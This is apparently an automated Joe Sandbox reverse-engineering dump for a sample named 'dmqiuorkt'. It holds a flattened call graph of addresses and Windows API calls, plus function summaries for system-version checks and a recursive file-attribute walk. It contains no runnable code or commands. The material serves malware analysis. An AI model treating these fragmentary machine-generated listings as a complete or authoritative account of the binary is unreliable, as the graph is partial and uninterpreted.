100161->100163 100162 85be6d 8 API calls 100162->100163 100163->100159 100163->100160 100163->100162 100164 857af4 8 API calls 100163->100164 100165 8565a4 8 API calls 100163->100165 100164->100163 100167 8bdc2c DeleteFileW 100165->100167 100166->99526 100167->100160 100168 8bdc57 FindClose 100167->100168 100168->100166 100170 89587b 100169->100170 100173 856ac6 100169->100173 100171 8584b7 8 API calls 100170->100171 100174 89588c 100170->100174 100171->100174 100172 85bceb 8 API calls 100175 895896 100172->100175 100176 87016b 8 API calls 100173->100176 100174->100172 100175->100175 100177 856ad9 100176->100177 100178 856af4 100177->100178 100179 856ae2 100177->100179 100181 85bf07 8 API calls 100178->100181 100180 85b25f 8 API calls 100179->100180 100182 856aea 
100180->100182 100181->100182 100182->99533 100182->99536 100184 895985 100183->100184 100185 856e69 CreateFileW 100183->100185 100186 89598b CreateFileW 100184->100186 100187 856e88 100184->100187 100185->100187 100186->100187 100188 8959b3 100186->100188 100187->99566 100187->99567 100239 856bfa 100188->100239 100192 856b27 100191->100192 100205 856b24 ISource 100191->100205 100193 856bfa 3 API calls 100192->100193 100192->100205 100194 856b44 100193->100194 100195 89589b 100194->100195 100196 856b51 100194->100196 100198 86fdc9 3 API calls 100195->100198 100197 87019b 8 API calls 100196->100197 100199 856b5d 100197->100199 100198->100205 100245 8541a6 100199->100245 100204 856bfa 3 API calls 100204->100205 100205->99574 100207 856bfa 3 API calls 100206->100207 100208 86fde7 100207->100208 100209 856bfa 3 API calls 100208->100209 100210 86fe08 100209->100210 100210->99554 100212 87019b 8 API calls 100211->100212 100213 857a39 100212->100213 100214 87016b 8 API calls 100213->100214 100215 857a47 100214->100215 100216 86bfbc 100215->100216 100217 86bfc7 100216->100217 100218 86c003 100216->100218 100217->100218 100220 86bfd6 100217->100220 100219 85bceb 8 API calls 100218->100219 100229 8bd2ab 100219->100229 100221 86bfeb 100220->100221 100222 86bff8 100220->100222 100255 86c009 100221->100255 100262 8bd3b2 12 API calls 100222->100262 100225 86bff4 100225->99568 100227 8bd2da 100227->99568 100229->100227 100263 8bd249 100229->100263 100270 85acc0 8 API calls __fread_nolock 100229->100270 100230->99579 100231->99580 100232->99584 100233->99536 100234->99536 100236 85b050 2 API calls 100235->100236 100237 8541da 100236->100237 100237->99565 100238->99576 100244 856c11 100239->100244 100240 8958ec SetFilePointerEx 100241 856c98 SetFilePointerEx SetFilePointerEx 100243 856c64 100241->100243 100242 8958db 100242->100240 100243->100187 100244->100240 100244->100241 100244->100242 100244->100243 100246 87016b 8 API calls 100245->100246 100247 8541b8 100246->100247 100248 
85b050 100247->100248 100249 85b0cb 100248->100249 100252 85b05e 100248->100252 100254 86f13c SetFilePointerEx 100249->100254 100250 856b73 100250->100204 100252->100250 100253 85b09c ReadFile 100252->100253 100253->100250 100253->100252 100254->100252 100256 86c1f1 8 API calls 100255->100256 100257 86c021 100256->100257 100271 85adc1 100257->100271 100261 86c03c 100261->100225 100262->100225 100264 8bd26a 100263->100264 100265 8bd253 100263->100265 100267 85b050 2 API calls 100264->100267 100265->100264 100266 8bd259 100265->100266 100268 85b050 2 API calls 100266->100268 100269 8bd263 100267->100269 100268->100269 100269->100229 100270->100229 100285 86feaa 100271->100285 100273 85ae07 100273->100261 100277 858774 MultiByteToWideChar 100273->100277 100274 85b050 2 API calls 100275 85add2 100274->100275 100275->100273 100275->100274 100292 85b0e3 8 API calls __fread_nolock 100275->100292 100278 8587e7 100277->100278 100279 8587a0 100277->100279 100281 85bceb 8 API calls 100278->100281 100280 87019b 8 API calls 100279->100280 100282 8587b5 MultiByteToWideChar 100280->100282 100283 8587db 100281->100283 100293 8587f0 100282->100293 100283->100261 100286 8afe13 100285->100286 100287 86febb 100285->100287 100288 87016b 8 API calls 100286->100288 100287->100275 100289 8afe1d 100288->100289 100290 87019b 8 API calls 100289->100290 100291 8afe32 100290->100291 100292->100275 100294 858884 100293->100294 100296 858803 100293->100296 100295 8596d9 8 API calls 100294->100295 100302 858821 __fread_nolock 100295->100302 100296->100294 100297 85880f 100296->100297 100298 858847 100297->100298 100299 858819 100297->100299 100301 87016b 8 API calls 100298->100301 100300 858894 8 API calls 100299->100300 100300->100302 100303 858851 100301->100303 100302->100283 100304 87019b 8 API calls 100303->100304 100304->100302 100306 85bceb 8 API calls 100305->100306 100307 8dd6bf 100306->100307 100308 85bceb 8 API calls 100307->100308 100309 8dd6c7 100308->100309 100310 85bceb 8 API calls 
100309->100310 100311 8dd6cf 100310->100311 100312 8dd737 100311->100312 100313 85627c 8 API calls 100311->100313 100314 85bceb 8 API calls 100312->100314 100315 8dd6e5 100313->100315 100317 8dd735 100314->100317 100315->100312 100316 85627c 8 API calls 100315->100316 100318 8dd6f7 100316->100318 100320 858685 8 API calls 100317->100320 100318->100312 100319 8dd6fc 100318->100319 100321 8596d9 8 API calls 100319->100321 100322 8dd760 100320->100322 100326 8dd707 100321->100326 100323 858685 8 API calls 100322->100323 100324 8dd777 100323->100324 100325 8579ed 8 API calls 100324->100325 100327 8dd780 100325->100327 100328 858685 8 API calls 100326->100328 100327->99596 100329 8dd728 100328->100329 100330 8596d9 8 API calls 100329->100330 100330->100317 100332 85c269 8 API calls 100331->100332 100333 8dd30e CharUpperBuffW 100332->100333 100334 8dd329 100333->100334 100335 85bf07 8 API calls 100334->100335 100336 8dd334 100335->100336 100337 858685 8 API calls 100336->100337 100338 8dd347 _wcslen 100337->100338 100339 8579ed 8 API calls 100338->100339 100340 8dd3a4 _wcslen 100338->100340 100339->100340 100340->99598 100342 874dc6 100341->100342 100343 874e3b 100341->100343 100350 874deb 100342->100350 100352 87f669 20 API calls _abort 100342->100352 100354 874e4d 40 API calls 4 library calls 100343->100354 100346 874e48 100346->99610 100347 874dd2 100353 882b7c 26 API calls ___std_exception_copy 100347->100353 100349 874ddd 100349->99610 100350->99610 100352->100347 100353->100349 100354->100346 100365 8be723 100355->100365 100357 8bdd9b CloseHandle 100357->99679 100358 8bdce9 Process32NextW 100358->100357 100364 8bdce2 100358->100364 100359 85bf07 8 API calls 100359->100364 100360 85b25f 8 API calls 100360->100364 100361 85694e 8 API calls 100361->100364 100362 857af4 8 API calls 100362->100364 100363 86e2e5 41 API calls 100363->100364 100364->100357 100364->100358 100364->100359 100364->100360 100364->100361 100364->100362 100364->100363 100369 8be72e 100365->100369 
100366 8be745 100372 87668b 39 API calls _strftime 100366->100372 100369->100366 100370 8be74b 100369->100370 100371 876742 GetStringTypeW _strftime 100369->100371 100370->100364 100371->100369 100372->100370 100374 85bf07 8 API calls 100373->100374 100375 8b9b6d 100374->100375 100376 857a14 8 API calls 100375->100376 100377 8b9b81 100376->100377 100378 8b96e3 41 API calls 100377->100378 100384 8b9ba3 100377->100384 100380 8b9b9d 100378->100380 100382 858685 8 API calls 100380->100382 100380->100384 100381 858685 8 API calls 100381->100384 100382->100384 100383 857af4 8 API calls 100383->100384 100384->100381 100384->100383 100385 8b9c42 100384->100385 100388 8b9c26 100384->100388 100392 8b96e3 100384->100392 100386 85be6d 8 API calls 100385->100386 100387 8b9c51 100385->100387 100386->100387 100387->99711 100389 858685 8 API calls 100388->100389 100390 8b9c36 100389->100390 100391 857af4 8 API calls 100390->100391 100391->100385 100393 8b9703 _wcslen 100392->100393 100394 8b97f2 100393->100394 100396 8b9738 100393->100396 100398 8b97f7 100393->100398 100394->100384 100395 86e2e5 41 API calls 100395->100396 100396->100394 100396->100395 100397 86e2e5 41 API calls 100397->100398 100398->100394 100398->100397 100400 858e70 52 API calls 100399->100400 100401 8d88ed 100400->100401 100425 8d8932 ISource 100401->100425 100437 8d9632 100401->100437 100403 8d8bde 100404 8d8dac 100403->100404 100409 8d8bec 100403->100409 100505 8d9843 59 API calls 100404->100505 100407 8d8dbb 100407->100409 100410 8d8dc7 100407->100410 100408 858e70 52 API calls 100427 8d89a6 100408->100427 100450 8d87e3 100409->100450 100410->100425 100415 8d8c25 100464 870000 100415->100464 100418 8d8c5f 100468 857d51 100418->100468 100419 8d8c45 100503 8c3ef6 81 API calls __wsopen_s 100419->100503 100422 8d8c50 GetCurrentProcess TerminateProcess 100422->100418 100425->99722 100427->100403 100427->100408 100427->100425 100501 8b4a0c 8 API calls __fread_nolock 100427->100501 100502 8d8e7c 41 API calls 
_strftime 100427->100502 100428 8d8e22 100428->100425 100433 8d8e36 FreeLibrary 100428->100433 100429 861c50 8 API calls 100430 8d8c9e 100429->100430 100431 8d94da 74 API calls 100430->100431 100435 8d8caf 100431->100435 100433->100425 100435->100428 100479 861c50 100435->100479 100490 8d94da 100435->100490 100504 85b3fe 8 API calls 100435->100504 100438 85c269 8 API calls 100437->100438 100439 8d964d CharLowerBuffW 100438->100439 100440 8b96e3 41 API calls 100439->100440 100441 8d966e 100440->100441 100443 85bf07 8 API calls 100441->100443 100449 8d96a7 _wcslen 100441->100449 100444 8d9689 100443->100444 100445 858685 8 API calls 100444->100445 100446 8d969d 100445->100446 100447 8596d9 8 API calls 100446->100447 100447->100449 100448 8d97bd _wcslen 100448->100427 100449->100448 100506 8d8e7c 41 API calls _strftime 100449->100506 100451 8d8849 100450->100451 100452 8d87fe 100450->100452 100456 8d99f5 100451->100456 100453 87019b 8 API calls 100452->100453 100454 8d8820 100453->100454 100454->100451 100455 87016b 8 API calls 100454->100455 100455->100454 100457 8d9c0a ISource 100456->100457 100462 8d9a19 _strcat _wcslen ___std_exception_copy 100456->100462 100457->100415 100458 85c92d 39 API calls 100458->100462 100459 85c5df 39 API calls 100459->100462 100460 85c9fb 39 API calls 100460->100462 100461 858e70 52 API calls 100461->100462 100462->100457 100462->100458 100462->100459 100462->100460 100462->100461 100507 8bf7da 10 API calls _wcslen 100462->100507 100465 870015 100464->100465 100466 8700ad TerminateProcess 100465->100466 100467 87007b 100465->100467 100466->100467 100467->100418 100467->100419 100469 857d59 100468->100469 100470 87016b 8 API calls 100469->100470 100471 857d67 100470->100471 100508 858386 100471->100508 100474 8583b0 100511 85c700 100474->100511 100476 87019b 8 API calls 100478 85845c 100476->100478 100477 8583c0 100477->100476 100477->100478 100478->100429 100478->100435 100480 861c62 100479->100480 100482 861d20 100480->100482 100484 
861c6b 100480->100484 100519 86b71c 8 API calls 100480->100519 100482->100435 100483 87016b 8 API calls 100485 861d89 100483->100485 100484->100482 100484->100483 100486 87016b 8 API calls 100485->100486 100487 861d92 100486->100487 100488 85b25f 8 API calls 100487->100488 100489 861da1 100488->100489 100489->100435 100491 8d94f2 100490->100491 100500 8d950e 100490->100500 100492 8d94f9 100491->100492 100493 8d951a 100491->100493 100494 8d95c3 100491->100494 100491->100500 100520 8bf3fd 10 API calls _strlen 100492->100520 100497 856ab6 8 API calls 100493->100497 100521 8c15b3 72 API calls ISource 100494->100521 100497->100500 100498 8d9503 100499 856ab6 8 API calls 100498->100499 100499->100500 100500->100435 100501->100427 100502->100427 100503->100422 100504->100435 100505->100407 100506->100448 100507->100462 100509 87016b 8 API calls 100508->100509 100510 857d6f 100509->100510 100510->100474 100512 85c70b 100511->100512 100513 8a1228 100512->100513 100518 85c713 ISource 100512->100518 100514 87016b 8 API calls 100513->100514 100516 8a1234 100514->100516 100515 85c71a 100515->100477 100517 85c780 8 API calls 100517->100518 100518->100515 100518->100517 100519->100484 100520->100498 100521->100500 100522 8615af 100529 86e34f 100522->100529 100524 8615c5 100538 86e3b3 100524->100538 100526 8615ef 100550 8c3ef6 81 API calls __wsopen_s 100526->100550 100528 8a61ab 100530 86e370 100529->100530 100531 86e35d 100529->100531 100533 86e375 100530->100533 100534 86e3a3 100530->100534 100551 85b3fe 8 API calls 100531->100551 100535 87016b 8 API calls 100533->100535 100552 85b3fe 8 API calls 100534->100552 100537 86e367 100535->100537 100537->100524 100539 857a14 8 API calls 100538->100539 100540 86e3ea 100539->100540 100541 85b25f 8 API calls 100540->100541 100542 86e41b 100540->100542 100543 8ae4e4 100541->100543 100542->100526 100544 857af4 8 API calls 100543->100544 100545 8ae4ef 100544->100545 100553 86e73b 39 API calls 100545->100553 100547 8ae502 100549 8ae506 
100547->100549 100554 85b3fe 8 API calls 100547->100554 100549->100549 100550->100528 100551->100537 100552->100537 100553->100547 100554->100549 100555 86230c 100556 862315 __fread_nolock 100555->100556 100557 858e70 52 API calls 100556->100557 100558 8a7487 100556->100558 100559 861fa7 __fread_nolock 100556->100559 100562 862366 100556->100562 100563 87016b 8 API calls 100556->100563 100566 87019b 8 API calls 100556->100566 100557->100556 100567 85662b 8 API calls __fread_nolock 100558->100567 100561 8a7493 100561->100559 100565 85be6d 8 API calls 100561->100565 100564 857cb3 8 API calls 100562->100564 100563->100556 100564->100559 100565->100559 100566->100556 100567->100561 100568 8927a2 100571 852a52 100568->100571 100572 852a91 mciSendStringW 100571->100572 100573 8939f4 DestroyWindow 100571->100573 100574 852aad 100572->100574 100575 852d08 100572->100575 100578 893a00 100573->100578 100576 852abb 100574->100576 100574->100578 100575->100574 100577 852d17 UnregisterHotKey 100575->100577 100603 852e70 100576->100603 100577->100575 100580 893a1e FindClose 100578->100580 100582 893a45 100578->100582 100583 857953 CloseHandle 100578->100583 100580->100578 100585 893a58 FreeLibrary 100582->100585 100586 893a69 100582->100586 100583->100578 100584 852ad0 100584->100586 100589 852ade 100584->100589 100585->100582 100587 893a7d VirtualFree 100586->100587 100592 852b4b 100586->100592 100587->100586 100588 852b3a CoUninitialize 100588->100592 100589->100588 100590 893ac5 100595 893ad4 ISource 100590->100595 100609 8c3c45 6 API calls ISource 100590->100609 100592->100590 100593 852b56 100592->100593 100607 852f86 VirtualFreeEx CloseHandle 100593->100607 100599 893b63 100595->100599 100610 8b6d63 8 API calls ISource 100595->100610 100597 852b7c 100597->100595 100598 852c61 100597->100598 100598->100599 100600 852caf 100598->100600 100599->100599 100600->100599 100608 852eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 100600->100608 100602 
852d03 100604 852e7d 100603->100604 100605 852ac2 100604->100605 100611 8b78b9 8 API calls 100604->100611 100605->100582 100605->100584 100607->100597 100608->100602 100609->100590 100610->100595 100611->100604 100612 87078b 100613 870797 ___DestructExceptionObject 100612->100613 100642 870241 100613->100642 100615 8708f1 100683 870bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 100615->100683 100616 87079e 100616->100615 100619 8707c8 100616->100619 100618 8708f8 100676 8751e2 100618->100676 100629 870807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 100619->100629 100653 88280d 100619->100653 100626 8707e7 100628 870868 100661 870ce9 100628->100661 100629->100628 100679 8751aa 38 API calls 2 library calls 100629->100679 100631 87086e 100665 8532a2 100631->100665 100636 87088a 100636->100618 100637 87088e 100636->100637 100638 870897 100637->100638 100681 875185 28 API calls _abort 100637->100681 100682 8703d0 13 API calls 2 library calls 100638->100682 100641 87089f 100641->100626 100643 87024a 100642->100643 100685 870a28 IsProcessorFeaturePresent 100643->100685 100645 870256 100686 873024 10 API calls 3 library calls 100645->100686 100647 87025b 100652 87025f 100647->100652 100687 8826a7 100647->100687 100650 870276 100650->100616 100652->100616 100654 882824 100653->100654 100655 870e1c CatchGuardHandler 5 API calls 100654->100655 100656 8707e1 100655->100656 100656->100626 100657 8827b1 100656->100657 100658 8827e0 100657->100658 100659 870e1c CatchGuardHandler 5 API calls 100658->100659 100660 882809 100659->100660 100660->100629 100762 8726d0 100661->100762 100664 870d0f 100664->100631 100666 853309 100665->100666 100667 8532ae IsThemeActive 100665->100667 100680 870d22 GetModuleHandleW 100666->100680 100764 8752d3 100667->100764 100669 8532d9 100770 875339 100669->100770 100671 8532e0 100777 85326d SystemParametersInfoW SystemParametersInfoW 100671->100777 100673 
8532e7 100778 853312 100673->100778 101656 874f5f 100676->101656 100679->100628 100680->100636 100681->100638 100682->100641 100683->100618 100685->100645 100686->100647 100691 88d596 100687->100691 100690 87304d 8 API calls 3 library calls 100690->100652 100694 88d5b3 100691->100694 100695 88d5af 100691->100695 100693 870268 100693->100650 100693->100690 100694->100695 100697 884f8b 100694->100697 100709 870e1c 100695->100709 100698 884f97 ___DestructExceptionObject 100697->100698 100716 8832ee EnterCriticalSection 100698->100716 100700 884f9e 100717 88543f 100700->100717 100702 884fad 100708 884fbc 100702->100708 100730 884e1f 29 API calls 100702->100730 100705 884fb7 100731 884ed5 GetStdHandle GetFileType 100705->100731 100707 884fcd __wsopen_s 100707->100694 100732 884fd8 LeaveCriticalSection _abort 100708->100732 100710 870e27 IsProcessorFeaturePresent 100709->100710 100711 870e25 100709->100711 100713 870fee 100710->100713 100711->100693 100761 870fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 100713->100761 100715 8710d1 100715->100693 100716->100700 100718 88544b ___DestructExceptionObject 100717->100718 100719 885458 100718->100719 100720 88546f 100718->100720 100741 87f669 20 API calls _abort 100719->100741 100733 8832ee EnterCriticalSection 100720->100733 100723 88545d 100742 882b7c 26 API calls ___std_exception_copy 100723->100742 100725 885467 __wsopen_s 100725->100702 100726 8854a7 100743 8854ce LeaveCriticalSection _abort 100726->100743 100728 88547b 100728->100726 100734 885390 100728->100734 100730->100705 100731->100708 100732->100707 100733->100728 100744 88500d 100734->100744 100736 8853af 100752 882d58 100736->100752 100738 885401 100738->100728 100740 8853a2 100740->100736 100751 883795 11 API calls 2 library calls 100740->100751 100741->100723 100742->100725 100743->100725 100749 88501a _abort 100744->100749 100745 88505a 100759 87f669 20 API calls _abort 100745->100759 100746 885045 
RtlAllocateHeap 100747 885058 100746->100747 100746->100749 100747->100740 100749->100745 100749->100746 100758 87523d 7 API calls 2 library calls 100749->100758 100751->100740 100753 882d63 RtlFreeHeap 100752->100753 100757 882d8c _free 100752->100757 100754 882d78 100753->100754 100753->100757 100760 87f669 20 API calls _abort 100754->100760 100756 882d7e GetLastError 100756->100757 100757->100738 100758->100749 100759->100747 100760->100756 100761->100715 100763 870cfc GetStartupInfoW 100762->100763 100763->100664 100765 8752df ___DestructExceptionObject 100764->100765 100827 8832ee EnterCriticalSection 100765->100827 100767 8752ea pre_c_initialization 100828 87532a 100767->100828 100769 87531f __wsopen_s 100769->100669 100771 875345 100770->100771 100772 87535f 100770->100772 100771->100772 100832 87f669 20 API calls _abort 100771->100832 100772->100671 100774 87534f 100833 882b7c 26 API calls ___std_exception_copy 100774->100833 100776 87535a 100776->100671 100777->100673 100779 853322 __wsopen_s 100778->100779 100780 85bf07 8 API calls 100779->100780 100781 85332e GetCurrentDirectoryW 100780->100781 100834 854f60 100781->100834 100827->100767 100831 883336 LeaveCriticalSection 100828->100831 100830 875331 100830->100769 100831->100830 100832->100774 100833->100776 100835 85bf07 8 API calls 100834->100835 100836 854f76 100835->100836 100956 8560f5 100836->100956 100838 854f94 100839 85bceb 8 API calls 100838->100839 100840 854fa8 100839->100840 100841 85be6d 8 API calls 100840->100841 100842 854fb3 100841->100842 100970 8588e8 100842->100970 100845 85b25f 8 API calls 100846 854fcc 100845->100846 100847 85bdc1 39 API calls 100846->100847 100848 854fdc 100847->100848 100849 85b25f 8 API calls 100848->100849 100850 855002 100849->100850 100851 85bdc1 39 API calls 100850->100851 100852 855011 100851->100852 100853 85bf07 8 API calls 100852->100853 100854 85502f 100853->100854 100973 855151 100854->100973 100957 856102 __wsopen_s 100956->100957 100958 8584b7 8 API 
calls 100957->100958 100959 856134 100957->100959 100958->100959 100960 85627c 8 API calls 100959->100960 100968 85616a 100959->100968 100960->100959 100961 85b25f 8 API calls 100962 856261 100961->100962 100964 85684e 8 API calls 100962->100964 100963 85b25f 8 API calls 100963->100968 100966 85626d 100964->100966 100965 85627c 8 API calls 100965->100968 100966->100838 100968->100963 100968->100965 100969 856238 100968->100969 100990 85684e 100968->100990 100969->100961 100969->100966 100971 87016b 8 API calls 100970->100971 100972 854fbf 100971->100972 100972->100845 100991 85685d 100990->100991 100995 85687e __fread_nolock 100990->100995 100993 87019b 8 API calls 100991->100993 100992 87016b 8 API calls 100994 856891 100992->100994 100993->100995 100994->100968 100995->100992 101657 874f6b _abort 101656->101657 101658 874f84 101657->101658 101659 874f72 101657->101659 101680 8832ee EnterCriticalSection 101658->101680 101695 8750b9 GetModuleHandleW 101659->101695 101662 874f77 101662->101658 101696 8750fd GetModuleHandleExW 101662->101696 101663 875029 101684 875069 101663->101684 101667 875000 101672 875018 101667->101672 101673 8827b1 _abort 5 API calls 101667->101673 101669 874f8b 101669->101663 101669->101667 101681 882538 101669->101681 101670 875046 101687 875078 101670->101687 101671 875072 101704 8920c9 5 API calls CatchGuardHandler 101671->101704 101674 8827b1 _abort 5 API calls 101672->101674 101673->101672 101674->101663 101680->101669 101705 882271 101681->101705 101724 883336 LeaveCriticalSection 101684->101724 101686 875042 101686->101670 101686->101671 101725 88399c 101687->101725 101690 8750a6 101693 8750fd _abort 8 API calls 101690->101693 101691 875086 GetPEB 101691->101690 101692 875096 GetCurrentProcess TerminateProcess 101691->101692 101692->101690 101694 8750ae ExitProcess 101693->101694 101695->101662 101697 875127 GetProcAddress 101696->101697 101698 87514a 101696->101698 101701 87513c 101697->101701 101699 875150 FreeLibrary 101698->101699 
101700 875159 101698->101700 101699->101700 101702 870e1c CatchGuardHandler 5 API calls 101700->101702 101701->101698 101703 874f83 101702->101703 101703->101658 101708 882220 101705->101708 101707 882295 101707->101667 101709 88222c ___DestructExceptionObject 101708->101709 101716 8832ee EnterCriticalSection 101709->101716 101711 88223a 101717 8822c1 101711->101717 101715 882258 __wsopen_s 101715->101707 101716->101711 101718 8822e1 101717->101718 101721 8822e9 101717->101721 101719 870e1c CatchGuardHandler 5 API calls 101718->101719 101720 882247 101719->101720 101723 882265 LeaveCriticalSection _abort 101720->101723 101721->101718 101722 882d58 _free 20 API calls 101721->101722 101722->101718 101723->101715 101724->101686 101726 8839c1 101725->101726 101727 8839b7 101725->101727 101732 883367 5 API calls 2 library calls 101726->101732 101729 870e1c CatchGuardHandler 5 API calls 101727->101729 101730 875082 101729->101730 101730->101690 101730->101691 101731 8839d8 101731->101727 101732->101731 101733 8ae5f8 GetUserNameW 101734 8ae610 101733->101734 101735 8a7e9e 101736 862e53 ISource 101735->101736 101738 862edd 101736->101738 101739 86e29c 8 API calls ISource 101736->101739 101739->101736 101740 85f470 101743 869fa5 101740->101743 101742 85f47c 101744 869fc6 101743->101744 101745 86a023 101743->101745 101744->101745 101747 8602f0 253 API calls 101744->101747 101749 86a067 101745->101749 101752 8c3ef6 81 API calls __wsopen_s 101745->101752 101750 869ff7 101747->101750 101748 8a800f 101748->101748 101749->101742 101750->101745 101750->101749 101751 85be6d 8 API calls 101750->101751 101751->101745 101752->101748 101753 8794d1 101763 87e048 101753->101763 101757 8794de 101758 88510a 20 API calls 101757->101758 101759 8794ed DeleteCriticalSection 101758->101759 101759->101757 101760 879508 101759->101760 101761 882d58 _free 20 API calls 101760->101761 101762 879513 101761->101762 101776 87e051 101763->101776 101765 8794d9 101766 88506a 101765->101766 101767 885076 
___DestructExceptionObject 101766->101767 101793 8832ee EnterCriticalSection 101767->101793 101769 885081 101770 8850ec 101769->101770 101772 8850c0 DeleteCriticalSection 101769->101772 101773 87ea08 67 API calls 101769->101773 101794 885101 101770->101794 101774 882d58 _free 20 API calls 101772->101774 101773->101769 101774->101769 101775 8850f8 __wsopen_s 101775->101757 101777 87e05d ___DestructExceptionObject 101776->101777 101786 8832ee EnterCriticalSection 101777->101786 101779 87e100 101787 87e120 101779->101787 101782 87e10c __wsopen_s 101782->101765 101784 87e06c 101784->101779 101785 87e001 66 API calls 101784->101785 101790 87951d EnterCriticalSection 101784->101790 101791 87e0f6 LeaveCriticalSection __fread_nolock 101784->101791 101785->101784 101786->101784 101792 883336 LeaveCriticalSection 101787->101792 101789 87e127 101789->101782 101790->101784 101791->101784 101792->101789 101793->101769 101797 883336 LeaveCriticalSection 101794->101797 101796 885108 101796->101775 101797->101796 101798 851033 101803 856686 101798->101803 101802 851042 101804 85bf07 8 API calls 101803->101804 101805 8566f4 101804->101805 101811 8555cc 101805->101811 101807 856791 101808 851038 101807->101808 101814 8568e6 8 API calls __fread_nolock 101807->101814 101810 870433 29 API calls __onexit 101808->101810 101810->101802 101815 8555f8 101811->101815 101814->101807 101816 8555eb 101815->101816 101817 855605 101815->101817 101816->101807 101817->101816 101818 85560c RegOpenKeyExW 101817->101818 101818->101816 101819 855626 RegQueryValueExW 101818->101819 101820 85565c RegCloseKey 101819->101820 101821 855647 101819->101821 101820->101816 101821->101820 101822 8ae6dd 101823 8ae68a 101822->101823 101826 8be753 SHGetFolderPathW 101823->101826 101827 8584b7 8 API calls 101826->101827 101828 8ae693 101827->101828 101829 86f9b1 101830 86f9dc 101829->101830 101831 86f9bb 101829->101831 101837 8afadc 101830->101837 101838 8b55d9 8 API calls ISource 101830->101838 101832 85c34b 8 API 
calls 101831->101832 101833 86f9cb 101832->101833 101835 85c34b 8 API calls 101833->101835 101836 86f9db 101835->101836 101838->101830 101839 85367c 101842 853696 101839->101842 101843 8536ad 101842->101843 101844 853711 101843->101844 101845 8536b2 101843->101845 101883 85370f 101843->101883 101847 853717 101844->101847 101848 893dce 101844->101848 101849 8536bf 101845->101849 101850 85378b PostQuitMessage 101845->101850 101846 8536f6 DefWindowProcW 101870 853690 101846->101870 101851 853743 SetTimer RegisterWindowMessageW 101847->101851 101852 85371e 101847->101852 101898 852f24 10 API calls 101848->101898 101853 893e3b 101849->101853 101854 8536ca 101849->101854 101850->101870 101858 85376c CreatePopupMenu 101851->101858 101851->101870 101856 853727 KillTimer 101852->101856 101857 893d6f 101852->101857 101903 8bc80c 65 API calls ___scrt_fastfail 101853->101903 101859 853795 101854->101859 101860 8536d4 101854->101860 101894 85388e Shell_NotifyIconW ___scrt_fastfail 101856->101894 101865 893daa MoveWindow 101857->101865 101866 893d74 101857->101866 101858->101870 101887 86fcbb 101859->101887 101868 8536df 101860->101868 101874 893e20 101860->101874 101862 893def 101899 86f1c6 40 API calls 101862->101899 101865->101870 101871 893d99 SetFocus 101866->101871 101872 893d7a 101866->101872 101875 853779 101868->101875 101876 8536ea 101868->101876 101869 893e4d 101869->101846 101869->101870 101871->101870 101872->101876 101877 893d83 101872->101877 101873 85373a 101895 85572c DeleteObject DestroyWindow 101873->101895 101874->101846 101902 8b1367 8 API calls 101874->101902 101896 8537a6 75 API calls ___scrt_fastfail 101875->101896 101876->101846 101900 85388e Shell_NotifyIconW ___scrt_fastfail 101876->101900 101897 852f24 10 API calls 101877->101897 101881 853789 101881->101870 101883->101846 101885 893e14 101901 8538f2 60 API calls ___scrt_fastfail 101885->101901 101888 86fd59 101887->101888 101889 86fcd3 ___scrt_fastfail 101887->101889 101888->101870 101904 855f59 

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 00855DA7
  • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
• GetCurrentProcess.KERNEL32(?,008EDC2C,00000000,?,?), ref: 00855ED3
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00855EDA
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00855F05
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00855F17
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00855F25
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00855F2C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00855F51
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: bafac0a992debb7e028e4d0e9dd74bcdff0786610d0fedcd1604d3191939f1ec
• Instruction ID: 51e6e4eac7e8cdc4c695e5eb9be9bd980c328e88e590a7be1c033bc0538ba1eb
• Opcode Fuzzy Hash: bafac0a992debb7e028e4d0e9dd74bcdff0786610d0fedcd1604d3191939f1ec
• Instruction Fuzzy Hash: 8EA1D83282E7C5EFCB32EB687C515997F94BB36B05B085898E481E7221C63C454EEB31

Control-flow Graph
APIs
• FindFirstFileW.KERNELBASE(?,?,76F88FB0,?,00000000), ref: 008C9FC0
• GetFileAttributesW.KERNELBASE(?), ref: 008C9FFE
• SetFileAttributesW.KERNELBASE(?,?), ref: 008CA018
• FindNextFileW.KERNELBASE(00000000,?), ref: 008CA030
• FindClose.KERNEL32(00000000), ref: 008CA03B
• FindFirstFileW.KERNEL32(*.*,?), ref: 008CA057
• SetCurrentDirectoryW.KERNEL32(?), ref: 008CA0A7
• SetCurrentDirectoryW.KERNEL32(00917B94), ref: 008CA0C5
• FindNextFileW.KERNEL32(00000000,00000010), ref: 008CA0CF
• FindClose.KERNEL32(00000000), ref: 008CA0DC
• FindClose.KERNEL32(00000000), ref: 008CA0EC
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
